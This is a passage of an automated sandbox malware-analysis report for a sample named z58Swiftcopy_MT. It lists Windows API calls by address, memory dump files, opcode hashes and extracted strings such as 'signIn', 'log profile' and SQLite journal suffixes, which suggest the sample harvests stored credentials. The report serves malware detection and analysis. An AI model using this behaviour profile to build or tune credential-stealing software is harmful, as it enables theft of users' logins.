                                                                                                                                                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3015003838-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 59245283-0
                                                                                                                                                                                                                                      • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004185AC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2802642348-0
                                                                                                                                                                                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                      • String ID: 3A
                                                                                                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                                                                                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                                      • String ID: strings
                                                                                                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                                      • API String ID: 776488737-1622828088
                                                                                                                                                                                                                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: -journal$-wal
                                                                                                                                                                                                                                      • API String ID: 438689982-2894717839
                                                                                                                                                                                                                                      • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3975816621-0
                                                                                                                                                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2047574939-0
                                                                                                                                                                                                                                      • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
